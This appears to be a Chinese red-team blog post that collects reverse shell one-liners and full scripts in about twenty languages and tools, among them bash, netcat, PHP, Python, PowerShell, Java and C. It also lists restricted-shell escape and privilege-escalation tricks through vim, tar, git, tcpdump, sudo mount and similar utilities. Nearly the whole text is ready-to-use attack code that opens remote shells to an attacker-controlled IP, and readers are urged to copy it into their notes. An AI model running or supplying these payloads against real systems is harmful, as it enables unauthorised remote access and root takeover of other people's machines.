紅隊筆記專屬-shell備忘錄
VSole2022-04-12 16:00:58
前言
建議直接復制粘貼到筆記,或點贊收藏,因為時常會用到,這是整理的一些常見的反向shell和特權提升的筆記文檔,紅隊成員必會!
最全。
反向shell-備忘錄
通常在獲得遠程代碼執行之后,我們希望獲得一些交互式訪問—而不是發出單個命令獲取單個回顯或與 web shell 交互,從實戰的意義來講,反彈shell是非常有必要的,以下將從不同的工具出發
nc
listen:
nc -nlvp PORT
connect:
nc -e /bin/sh IP PORT
or
nc -c sh IP PORT rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
socat
listen:
socat tcp-listen:PORT -
connect:
socat exec:/bin/sh tcp:IP:PORT
交互式版本
listen:
socat file:`tty`,raw,echo=0 tcp-listen:PORT
connect:
socat exec:/bin/sh,pty,stderr,setsid,sigint,sane tcp:IP:PORT
ncat
listen:
ncat --allow IP -vnl PORT --ssl
connect:
ncat --exec /bin/sh --ssl IP PORT
sbd
listen:
sbd -lp PORT
connect:
sbd -e /bin/sh HOST PORT
加密版版本
listen:
sbd -l -c on -k ENCRYPTION_PHRASE -p PORT
connect:
sbd -k ENCRYPTION_PHRASE -e /bin/sh HOST PORT
bash
TCP
bash -i >& /dev/tcp/IP/PORT 0>&1
or
bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'
使用工具nc udp協議:
nc -u -lvp PORT
connect:
sh -i >& /dev/udp/IP/PORT 0>&1
php
簡單的php代碼版本:
php -r '$sock=fsockopen("IP", PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
完整的 PHP 腳本,帶有指定要連接的 IP 地址和端口的表單:
if (empty($_POST['i']) && empty($_POST['p'])) {
echo "IP address and port not specified!";
}
else
{
$ip = $_POST["i"];
$port = $_POST["p"];
$shell = 'uname -a; w; id; /bin/sh -i';
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$process = null;
$pipes = null;
$errno = "";
$errstr = "";
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "$errstr ($errno)";
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
echo "ERROR: Can't spawn shell";
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
while(!feof($sock) && !feof($pipes[1])) {
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
$input = fread($sock, $chunk_size);
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
$input = fread($pipes[1], $chunk_size);
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
$input = fread($pipes[2], $chunk_size);
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
}
?>
Perl
perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python腳本版本:
#!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP", PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
或從命令行使用python -c
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP", PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
Ruby
#!/usr/bin/ruby
require 'socket';
c=TCPSocket.new('IP', PORT)
$stdin.reopen(c)
$stdout.reopen(c)
$stderr.reopen(c)
$stdin.each_line{|l|l=l.strip;next if l.length==0;(IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }
或作為單行:
ruby -rsocket -e'f=TCPSocket.open("IP", PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Golang
使用源代碼創建文件,運行然后刪除源文件:
package main;
import"os/exec";
import"net";
func main() {
c, _ := net.Dial("tcp","IP:PORT");
cmd := exec.Command("/bin/sh");
cmd.Stdin=c;
cmd.Stdout = c;
cmd.Stderr = c;
cmd.Run()
}
保存文件,例如test.go,構建并運行:go run test.go
或者直接命令行
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/rev.go && go run /tmp/test.go && rm /tmp/test.go
Powershell
$address = 'IP'
$port = 'PORT'
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.RedirectStandardError = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}
或作為單行:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP', PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
nodejs
創建一個js文件
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(PORT, "IP", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
or
require("child_process").exec('bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"')
or
var x = global.process.mainModule.require
x('child_process').exec('nc IP PORT -e /bin/bash')
然后運行:
nodejs rev.js
或者直接執行命令
nodejs -e "require('child_process').exec('nc -e /bin/sh IP PORT')"
沒有nc版本:
nodejs -e "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/IP/PORT 0>&1\"')"
openssl
listen:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port PORT
connect:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect IP:PORT > /tmp/s; rm /tmp/s
Awk
連接到監聽器,然后關閉反向shell進入exit
awk 'BEGIN {s = "/inet/tcp/0/IP/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('IP','PORT');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Java
Linux
import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;
public class Rev {
public static void main(String[] args) {
String host="IP";
int port=PORT;
String cmd="/bin/sh";
try {
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
} catch (Exception e) {}
}
}
Windows
import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;
public class Rev {
public static void main(String[] args) {
String host="IP";
int port=PORT;
String cmd="cmd.exe";
try {
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
} catch (Exception e) {}
}
}
Groovy
Linux
String host="IP";
int port=PORT;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {p.exitValue();
break;
}
catch (Exception e){}
};
p.destroy();
s.close();
命令行執行:
groovy -e 'String host="IP";int port=PORT;String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();'
或者去通過線程去執行:
Thread.start {
String host="IP";
int port=PORT;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();break;
}
catch (Exception e){}
};
p.destroy();
s.close();
}
Windows
String host="IP";
int port=PORT;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}catch (Exception e){}
};
p.destroy();
s.close();
一行搞定:
groovy -e 'String host="IP";int port=PORT;String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();'
C
創建一個文件
#include
#include
#include
#include
#include
#include
#include
int main(void) {
int sockfd;
int lportno = PORT;
struct sockaddr_in serv_addr;
char *const params[] = {"/bin/sh", NULL};
char *const environ[] = {NULL};
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = inet_addr("IP");
serv_addr.sin_port = htons(lportno);
connect(sockfd, (struct sockaddr *) &serv_addr, 16);
dup2(sockfd, 0);
dup2(0, 1);
dup2(0, 2);
execve("/bin/sh", params, environ);
}
shell-逃跑指南
Vim
:sh :!/bin/bash
rVim
rvim --cmd ":py import os;os.system('/bin/bash')"
or
:python import os; os.system("/bin/bash")
nano / pico
直接運行nano:
bashnano -s /bin/bash
在文本內容編輯:
/bin/bash
按下Ctrl-T運行拼寫檢查
man, less, more
!shell !/bin/bash
Awk
awk 'BEGIN {system("/bin/sh")}'
find
find /dev/zero -exec /bin/bash \;
rbash
bash < 4.4
BASH_CMDS[poop]=/bin/bash;poop
文件讀取:
$(< ../../etc/passwd)
要么
mapfile ARRAY < ../../etc/passwd ARRAY echo $ARRAY
通過以下方式連接時不加載配置文件ssh:
ssh user@IP-ADDRESS -t "bash --noprofile"
Python
python
echo os.system('/bin/bash')
MySQL client
mysql>\! bash bash>
gdb
(gdb) ! id (gdb) ! /bin/bash (gdb) shell id
Netcat, ncat
nc -vlp PORT -e /bin/bash nc HOST PORT
Nmap
nmap --script <(echo 'os.execute("/bin/sh")')
通過腳本
nmap --script /tmp/script.nse
script.nse內容為
os.execute("id")
tcpdump
cat < shell.sh #!/bin/bash /bin/bash EOF chmod +x shell.sh sudo tcpdump -G 1 -z ./shell.sh -w 1.pcap
在讀取文件時執行腳本,內容為test.sh:
#!/bin/sh id
創建test.pcap大于 1MB 的文件,運行tcpdump:
tcpdump -r /tmp/test.pcap -C 1 -w /dev/null -z /tmp/test.sh
tar
tar c --checkpoint=1 --checkpoint-action=exec=bash a a.tar
zip
zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
strace
strace -o/dev/null /bin/bash
except
except spawn sh then sh
SCP
cat >/tmp/shell.sh < /bin/bash >&2 0>&2 EOF chmod +x shell.sh scp -S /tmp/shell.sh x y:
ssh
ssh -o ProxyCommand=/tmp/shell.sh localhost
git
git -c core.pager=/tmp/shell.sh --paginate help
or
git commit
或使用rebase
git rebase --exec "COMMAND" master
或者:
git rebase -ix "COMMAND" master
script
script -c /bin/bash /tmp/a
mount
user@host:~$ sudo mount -o bind /bin/bash /bin/mount user@host:~$ sudo mount root@host:~# id uid=0(root) gid=0(root) groups=0(root)
僅限 GNU 版本:
sudo mail --exec='!/bin/sh'
其他:
sudo -u USER mail -u USER -s xxxx aaa ~!id
sqlite
sqlite3 /dev/null '.shell /bin/sh'
通過加載擴展:
#include
void main()
{
execl("/bin/sh", NULL);
}
編譯為.so:
gcc -g -fPIC -shared /tmp/shell.c -o /tmp/shell.so
sqlite在shell中加載擴展:
sqlite> .load /tmp/shell.so main
socat
socat file:/bin/sh file:sh,create,perm=4755 > /dev/null ./sh
or
socat exec:/bin/sh -
apt-get / apt / aptitude
a:
apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"
b:
sudo apt-get changelog apt !/bin/sh
openssl
讀取文件:
openssl enc -in test.txt
寫文件:
LFILE=file_to_write echo DATA | openssl enc -out "$LFILE"
或者
LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF openssl enc -in "$TF" -out "$LFILE"
Python
>>> import pty
>>> pty.spawn('/bin/bash')
or
>>> import os
>>> os.system('ls')
>>> os.system('/bin/bash')
Ruby
ruby -e 'exec "/bin/sh"'
or
irb irb(main):001:0> exec '/bin/bash'
Perl
perl -e 'exec "/bin/sh";'
Lua
os.execute('/bin/sh')
或者
lua -e 'os.execute("/bin/sh")'
VSole
網絡安全專家